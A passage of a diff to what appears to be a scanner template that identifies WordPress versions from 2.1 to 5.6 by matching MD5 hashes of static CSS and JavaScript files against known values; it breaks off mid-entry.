+ - type: dsl + name: 3.5 + dsl: + - "(\"455d1a15d2c2112242449ce6edb5ac14\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"8cb6604046ddf6f3ef9d6e1fcddd31c1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"b18907877b011f5bbbdb949f75a3dd75\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c4daaa511f44a2df4ab86fce49eff839\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"890af0a8978150a6838937100d90e489\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f00c5d495a40b9be6deb67c4c2ea8e74\" == md5(body))" + - type: dsl + name: 3.0.5 - 3.0.6 + dsl: + - "(\"0cefbed58bc2260d2f92560d50cee967\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.4 + dsl: + - "(\"b38b6b854829c6a3cde9450b0820feaa\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"c7229ea07e54d5a7a4f6eb5627e690de\" == md5(body))" + - type: dsl 
+ name: 2.8.1 - 2.8.6 + dsl: + - "(\"88ce6f35b60890ede66b1ca4c39fc4af\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"e4f0fc3a74331d7d2060914068300ec0\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"bf5e7f1eebeddfa5b0e217bd868cd623\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"2fbacf0ddb5f88b962c3a1dbda73ca10\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a34f1474e3a5ade6b4483bc307bfde84\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"020069f33ed66ea68f9067c596d137cb\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"c80252996072ccb0aa20eb24bfc388e8\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"49b375e4fe6862c7d6b5445796fc11a5\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"9b5f5cfd0d4a6bb9104ba13a987f1616\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.3.6 + dsl: + - "(\"086a6977f592c2c633281623697b9c89\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b2b269b59688458f3be7720f258419d1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"23b646facdd6a9aa3e8a79809a0d4287\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"acee57a19cda70bf397555354cb1c128\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d5b03f5ca13605379b6c565ebfa55570\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"eeae1118610e5531c31ba2bcb9307e53\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"7f1d9aa97951aa4ef795807cacd48ed8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2b678b0930558d9605a9126e3e1e2aad\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dcd4d53323e183c283c45480f37272f0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8df6a448a11dc26010e5e58ffd258ff3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"bce0fcfa6d2d6f3e058c71e5830617ae\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"61c6df5b1e3a5cf6ebd565cb58f91e6e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"18bff3de0535b966f8d7304edae11046\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"ca91741630f5a7f59a741e9f8b80f426\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"1c060d191ff63e841d8f72eacaf4a6bf\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"07e615ff39dbb16e59116aeff6905b43\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"f1ad6ac5d3f3f0ad4d5865c8b3e60195\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"1e949d2c91490fed06cb0b747b913872\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"190b8b303e731c8f9a6174f994b4b8ec\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"26c698cf4308f7411829719c0092e3ba\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"f928859bbdce98c97c2c54a4866fd298\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"d93f9684a688e6b333732fc96a73ccd3\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"34785c29f6816b0e2def5d1425d684a4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"e68c7549dca30ee2b36ec0e3eb6f60db\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c1990e08d992a070008e812fd3431aa7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"182c51951e8c1266613ae4932d3bec01\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"ebc3225a9e7f4673168062c05bed5c71\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"7225426df452ba57c476c9c185a39884\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"823eee9bf2f9fac24c84264408bd143c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f4cc8a85c30c26c493d9529dce507e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard-rtl.css" + 
matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3027a880d7e45acd4aacde8b90570904\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"d3c3fcc9f814d55d40f611bf5680e0b6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e8fe2ba8fb7d0d6cfe0251cb256b30e7\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a8b46397a7fedad016bf5bbb35e65e78\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"980373b7e45d9657f82af1dbc31be9e9\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ebb761dcfd6cb62a9983a41f6c69266a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"07decee960d22fca5b6e94eaa647956e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"604d702e0a430f86e7bcb8b21279b43a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"699d46e0f1942549db67dfc2d3331ac7\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"059696f05866c8f228b4180b3e883a25\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"13a3866b367a914f06e876ce28a0c2df\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"6f15ff7135a5d85a53cdbd4631b6f575\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"81238c176822f1efd9d121eea5fbb3d7\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"9051793fd0506aa6b1b6a0247ea9794c\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"e1532114021a77a683c7415ec4e29db3\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"7119570d5ac7ab433dfc47504ba63306\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"96d44cd1c8b67c6c75fe69ca710f13e1\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"513061f4002f58bdf2078417a6a2de0c\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b4dcdb2ce9b2b421061b957711fcc5ef\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"8d8a310e7026d8f2e85d1ca298e847df\" == md5(body))" + - type: dsl + 
name: 5.1 - 5.1.8 + dsl: + - "(\"09cbf2e1b4d252605942102d50fc8669\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"5f811fc388851e1e47ec039e88788e46\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bb6cb59535e109ed4b6114e8fbf9a6b3\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"b125dfd27dc6d691dec23472c501f331\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"efe7d56a14eb97150e1b3895ff0912aa\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3a6681edc6beee72f24052981ffa455c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bd5147b8b23d61b9c5eb0291f6ef5882\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f2f1451cae3fbd07ed005df071713499\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0afe92ecadd20642405e068c198d81e5\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"6f48ef6a45393efdfdfbe8f8ed6a2506\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"66ea900f920a0f7b94920ef018724264\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5ba4e14b2d9cb19fb65b7cfa7fb5b9aa\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"617d5f0599c159412e1a3421d703f703\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"9eebc5ec4f78378537ea76f5ada4ea51\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"418e0259481989778b697f1a65f49a66\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"712664ed4085240ed13d04f257c48cf8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"be99c57389c7d414f0f58f33678a0824\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1feb400a4e9983895a55cf7aa0078b07\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"fc68bb88fbe1970c5f2c6ba9381896e4\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - 
"(\"2d5e5d35c3f1046f92c6bd0c3ad5e2be\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d96ee1aa49292d90a5d085764b1d33db\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"e824bb32e5294e03b23fdb2bc0ce2fcf\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"ac500823d8fc685bc093f052adf69020\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ef08248e4b4503b682c13cded1b0647a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0b55e6d96f87a218a1000470861c01bb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"77740c8d0bc7f991d1d8b32bde522ad8\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"b887a122adf7d35bc22e326f1d81dae2\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"6303281815f53c3c71c82bc776df6dc8\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"89ecbd877f22c7a4c4957d57fd27af25\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"aae0e1432448480894bf46b4af05127e\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"9aa9e8812ca07ae32b1a696c9eeb8f9b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1881393ac48ad40d1afcdf7a9f25c8ef\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c457a0d561db7907bb16385e74bc2167\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"120fb112fa760baf693787a8bb8e0d16\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"0902edb1b33e62df3b89e42ee0fb9284\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"38a79bf55e7a3b6ccba3b242e9b2de00\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"55238fac829b69520b226a3e70639cbc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"216986c56836217f278adc7452762759\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8c078f5f2fb09c39160fc5097196f668\" == md5(body))" + - type: 
dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6292dae0a22fbb3114f650ad14eb0633\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"cf0e90a5b0c60c057ee531590e2a1ea5\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"dca1f2c9b549b0c85b279a27e4adc142\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4f2215bdabcb2b4b32f3e62f1c913b12\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"54fc1f4a96ac646bf7c4a971e786d3cb\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"3260d285fda6904e237707fae35f2a5c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"8ac09095ebcc8c9ffcf6593c6f4118f7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"520f38940371585ea1be3adbe7ff9d37\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"a1c1f8d9141979d6cec1eb4e73e49ad1\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6bbb337fa6d1a1f211d0886806b10974\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"857ee04675bddc934ddeea341b86c976\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f082f7c7ff8deaf5e3ddbc77b37c6396\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d86c1fb98ee6afdd746b95f4346347c6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"f7c7964c2816428bf5404d506720cf67\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"dd14a6b9955fc92fab88fcbc6514925d\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"2e3fc0eacf4c93d49e1c6a1b2e6778f8\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"0b4b9fa4c732d440c63e7a7c292c67e5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"11eebad835b22f5e58524a023f7202ac\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2469caff3076ab9a6f6e27d191a5ff39\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-nav-menus.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - 
"(\"adc6503f011d23207fefb4ba2aefeb24\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"2ab2b22000b57942c42134efe73db683\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"38f10b79fbbffc9e741893014ea002b4\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"ecb1fddddee46cdebda2a0421aadeb63\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"676f559c24dcc8691869e86be3cf72c0\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"bc754d8cb65e8b7cb92f6ec38f5b3632\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"db180e593c9cf471de955acaeeeab54a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bbf4734a3338cf875235a5ada02c41b4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7299c58bcace8ce8a56b057b4656bc75\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"0bc26c3f8248b01d3431b73ac6d886a7\" == md5(body))" + - type: dsl + name: 4.3.1 + dsl: + - "(\"b19dec30505b46afbc06a72e9fc175e6\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"0495076f6aad785775658ecdfd5e939e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"c823f128adf2d3634b7d3ff5ebec04fe\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"b6bd555ecefea0378f027c9441a243e3\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"eaeb1c4c7104fb2fb2ac3fbd22a665b5\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"ac8716e6b7dfb4c763f73c94cb94a597\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e099bc0d6b8f5ec1bbe943f308e658a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"465011bcb652bfa98c9b63d205eb5273\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a1cc633332ed9f999720fe73d910315b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-nav-menus.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ab9e3ae2d4e5b67fa155e62311987bea\" == 
md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"62c76211a81251e495b11d23314da878\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"dc3b7e6bb1b67c77a8259d19df7eb7b1\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"f09d815335cd77c8c7777b2824254c07\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"9b6fd3900a2dd88c4de0e4655f362cb3\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"444b2358c6ad5e0be84b367b2e080a0f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"8984e47a6836e5b0fdb5e89049bb8084\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"852fe74d1ce464ec9e621e10e52428e8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"47e3575662370328eff294a91679a15f\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"b06763f8894176006633b67282d417ab\" == md5(body))" + - type: dsl + name: 4.3.1 + dsl: + - "(\"12a53b2080fee745c366799d75f36e49\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"eb8b822276e2dbfbc687a78ad65253dc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"abeadaf293f7a753b3f000b21513fbbd\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"b398320f5969c1c95bbf52ef6edf95ec\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"761a86bbff4239fc775162efb53fb2fb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"dab7c6fe47ffeebdd90036c2615fe84f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"3eeb230682665e3b3f0ec4752747c176\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"aff331bc7e43fdefe81544ce420ce9b3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a6ffef157a167b4fdf103bbd0418711e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"46fe96ba671876ce0808b48f733e19c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - 
"(\"52984e805a29165946383973e8551d5b\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"76dd539631f379ca702e9757f52a53f3\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"7d9001aa245e6004270b0389a945df88\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ba5d55100eab7af70a53164d5f2653b7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b8e891a43bc75441f6fbcec79f8c4793\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3b39195b45bf3dfd8fd9f1a0b0b70c3c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cad7dada660b400f74333b7c98413dd4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1e33af23a168b21a333bf6ba71ac4671\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d0af21973275bb0564f8d1525e0d325e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a7a6f1bc16e1f5c9bdd1b08d95151d11\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1c23a8dfcb49c96745ab5a40854041ec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"952c6da3495a55b489c237b8552fd666\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8d7e42146c845324eb5781a7a985dee0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c8d76423399c96a70dedb4fb51435fc8\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"bb72ad210956d7f1e6889dd89fea310f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7d816fc5436c48453c18a5b14be80f3a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"850b8a19ced6f9abaff2d890cae5611e\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"94db0977de867d05ca85e61a43580bbd\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"fe28c98656cdf515c7c6aa9de76da805\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"60f588936c53c1a1c4e545dd806a522f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - 
"(\"40f8ea7fd6fe99ea9ebf66ae9af50166\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"151b124e7cdd860734a5258c5b38abb4\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"b7c4a02b55be88d7bd743618b473a7ec\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"e46522d1a0b234fb177f8b328120fbe2\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"2a63ff20dac8b1a01f68f8874e4e3de5\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"4ec7288450a487a7c228d7e09a25dba6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"62fceaa11574bf917cbfaed196374da7\" == md5(body))" + - type: dsl + name: 4.9.2 + dsl: + - "(\"ed089860adc11ffbace721ab647297d1\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"e086a26a0c57fde0e82d1b600b6b8df9\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f34b196dd1411f3ab1cd1b9f284f02d5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"84801b81cf2cc9b89a0523225beaa6e0\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"335282bb7efb5b07951afe0a0639d66b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/rtl.css" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"abc1ae8e44b7b7820714416b155b9400\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"395db168cd1238d99584184ead0b324e\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"545758c52dbfa268fbebcf30daff4b4e\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"cf6bb826f170ceacd93cd4cb2cfd4661\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"2768e4099588e3689883dd201bd130d2\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ec098e76667af2ccd9a02f31f02fe270\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a805b001e7833d4e798ce5e53de34695\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"c3316d03e21caf854e9a27df34025d0a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - 
"(\"27166e3aa9fddf13dacef61f3154b99e\" == md5(body))" + - type: dsl + name: 2.2.3 + dsl: + - "(\"26fb3af4670b564efdefbf845d84266b\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.2 + dsl: + - "(\"ae64aa5c96bfecff5fda7ba51221c20b\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"94385d725a8f9a6292ed4ef9856b2d24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c4b004c430b5ef1d2bacd01b098e4a60\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ddf28ae11a49d546f52237a16604d024\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"378399e10bdc7cd9a25e8e80e909a545\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"501b29f8b4acb2f1209a2c69c97f9435\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"85f468b9ada7919c4a9b4411eaf19741\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8f7250aa912e64836b464e870274f8c3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a4f330ffa223e2629ea55241d5e7528f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"7103571c7f13000d5f8a5b3e335455c8\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"3fc8fe3072cf16bc8a1ea98214e2cebc\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"04f64d74b428649848955844036812f2\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"cda9416899dddadf313394ebd43cc7e1\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"6e38d42a1ea70cb8d6977d56f1540ae3\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"1a6661c026e5cc2c5d837e337cfdddb4\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6a9084969aab96f036b52d4f65ec1e92\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"6938abcd3a8afa6d7d1b93926844d9e3\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"18eaf0c9ea22cdb88360c02c21a38ccb\" == md5(body))" + - method: GET + 
